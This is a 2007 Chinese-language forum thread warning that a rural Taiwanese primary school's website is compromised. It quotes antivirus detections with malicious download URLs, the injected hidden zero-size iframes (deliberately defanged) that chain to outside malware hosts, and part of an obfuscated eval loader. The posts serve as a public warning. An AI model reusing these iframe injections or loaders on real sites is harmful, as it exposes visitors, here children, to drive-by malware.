PCDVD數位科技討論區
PCDVD數位科技討論區   註冊 常見問題 標記討論區為已讀

回到   PCDVD數位科技討論區 > 其他群組 > 七嘴八舌異言堂
帳戶
密碼
 

  回應
 
主題工具
德州炸雞
Major Member
 

加入日期: Mar 2007
文章: 153
屏東縣瑞光國小.. 病毒警告

該學校網站好像中標了

剛剛小朋友點入.卡巴一直跳一直卡

真懷疑進入學校網站的小學生電腦會怎樣


www.rgps.ptc.edu.tw不要點


已偵測到:木馬程式 Trojan-Downloader.JS.Agent.wk 指令碼:http://www.rgps.ptc.edu.tw/[5]
已偵測到:惡意軟體 Exploit.Win32.RealPlr.o 網址:http://www.loveyoushipin.com/pic/web.htm
已偵測到:病毒 Worm.Win32.Downloader.cs 網址:http://www.loveyoushipin.com/pic.exe//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\WINDOWS\rising306.exe//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8LINODQB\pic[1].exe//PE_Patch//UPack
已偵測到:木馬程式 Trojan-Downloader.Win32.Agent.ggs 網址:http://sss.969222.com/bak.css//PE_Patch.UPX//UPX
已偵測到:木馬程式 Trojan-Downloader.VBS.Psyme.lh 網址:http://count23.51yes.ws/ying/Ms06014.htm
已偵測到:病毒 Worm.Win32.Downloader.cx 網址:http://web.wzxyq.com/mm/mm.exe//PE_Patch//UPack
已刪除:新的威脅 (修改) 檔案:

已刪除:病毒 Worm.Win32.Downloader.cx 檔案:c:\windows\microsoft.pif
BAD_STATUS(5)病毒 Worm.Win32.Downloader.cx 檔案:c:\windows\microsoft.pif//PE_Patch
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\WINDOWS\rising197.exe
已刪除:病毒 Worm.Win32.Downloader.de 網址:http://down.llsging.com/bb/014.exe//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\49YB0LAV\pic[1].exe//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0009896.exe//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cx 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010852.pif//PE_Patch//UPack
已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010856.exe//PE_Patch//UPack
未發現:病毒 Worm.Win32.Downloader.cx 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010874.pif//PE_Patch//UPack
未發現:病毒 Worm.Win32.Downloader.cs 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010875.exe//PE_Patch//UPack
     
      

此文章於 2007-12-23 01:22 PM 被 德州炸雞 編輯.
舊 2007-12-23, 01:19 PM #1
回應時引用此文章
德州炸雞離線中  
李麥客
*停權中*
 
李麥客的大頭照
 

加入日期: Mar 2006
您的住址: 嘉義市全家便利商店
文章: 54
這種公家單位....而且又是稍微遠一點的學校
要是沒有什麼錢請外面代管網站
校務人員剛好又對電腦不太熟
自己架站的確很容易出包
 
舊 2007-12-23, 01:24 PM #2
回應時引用此文章
李麥客離線中  
missone
*停權中*
 

加入日期: Dec 2006
文章: 367
點進去一點反應也沒有啊?
KIS 7.0
舊 2007-12-23, 01:30 PM #3
回應時引用此文章
missone離線中  
darksnow
Golden Member
 

加入日期: Aug 2002
文章: 2,806
首頁被塞了這個



<ifrane src="hccp://w.aeaer.com/ae.htm" width=0 height=0></ifrane>


PS: 為了怕有人誤點, iframe改成ifrane http改成hccp
舊 2007-12-23, 01:54 PM #4
回應時引用此文章
darksnow離線中  
darksnow
Golden Member
 

加入日期: Aug 2002
文章: 2,806
ae.htm裡面又有這些

<ifrane src="hccp://w.aeaer.com/in.htm" width=0 height=0></ifrane>
<ifrane src="hccp://uu.uuzzvv.com/uu.htm" width=0 height=0></ifrane>
<ifrane src="hccp://fu.55189.net/" width=0 height=0></ifrane>
<ifrane src="hccp://an.sbb22.com/id.htm" width=0 height=0></ifrane>
<ifrane src="hccp://wz.070808.net/37.htm" width=0 height=0></ifrane>

然後這些xx.htm裡面又有其他的iframe連到其他網站,
喵的一層套一層,還真妙!

此文章於 2007-12-23 01:58 PM 被 darksnow 編輯.
舊 2007-12-23, 01:56 PM #5
回應時引用此文章
darksnow離線中  
missone
*停權中*
 

加入日期: Dec 2006
文章: 367
彈跳網頁嗎....?
舊 2007-12-23, 01:57 PM #6
回應時引用此文章
missone離線中  
darksnow
Golden Member
 

加入日期: Aug 2002
文章: 2,806
其中一個最後一層裡面是這個東西,
還有一個.js好像是解編碼用的

代碼:
<SCRIPT LANGUAGE='JavaScript'> 
function ResumeError() { 
return true; 
} 
window.onerror = ResumeError; 
</SCRIPT>
<SCRIPT LANGUAGE="JavaScript">
eval("\x2f\x2a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47
\x45\x3d\x27\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x27\x3e\x20\x0d\x0a\x66
\x75\x6e\x63\x74\x69\x6f\x6e\x20\x52\x65\x73\x75\x6d\x65\x45\x72\x72\x6f\x72
\x28\x29\x20\x7b\x20\x0d\x0a\x72\x65\x74\x75\x72\x6e\x20\x74\x72\x75\x65\x3b
\x20\x0d\x0a\x7d\x20\x0d\x0a\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x65\x72\x72
\x6f\x72\x20\x3d\x20\x52\x65\x73\x75\x6d\x65\x45\x72\x72\x6f\x72\x3b\x20\x0d
.................太多略
舊 2007-12-23, 02:02 PM #7
回應時引用此文章
darksnow離線中  
John-Wel
Power Member
 
John-Wel的大頭照
 

加入日期: Dec 2006
文章: 627
真的有毒
舊 2007-12-23, 03:26 PM #8
回應時引用此文章
John-Wel離線中  
willism
Master Member
 
willism的大頭照
 

加入日期: Mar 2006
文章: 1,772
那就麻煩樓主告知學校這件事吧
舊 2007-12-23, 03:41 PM #9
回應時引用此文章
willism離線中  
hufun
Major Member
 
hufun的大頭照
 

加入日期: Aug 2004
文章: 161
請樓主告知該校的資訊組長或教務處吧
舊 2007-12-23, 03:46 PM #10
回應時引用此文章
hufun離線中  


    回應


POPIN
主題工具

發表文章規則
不可以發起新主題
不可以回應主題
不可以上傳附加檔案
不可以編輯您的文章

vB 代碼打開
[IMG]代碼打開
HTML代碼關閉



所有的時間均為GMT +8。 現在的時間是09:22 AM.


vBulletin Version 3.0.1
powered_by_vbulletin 2025。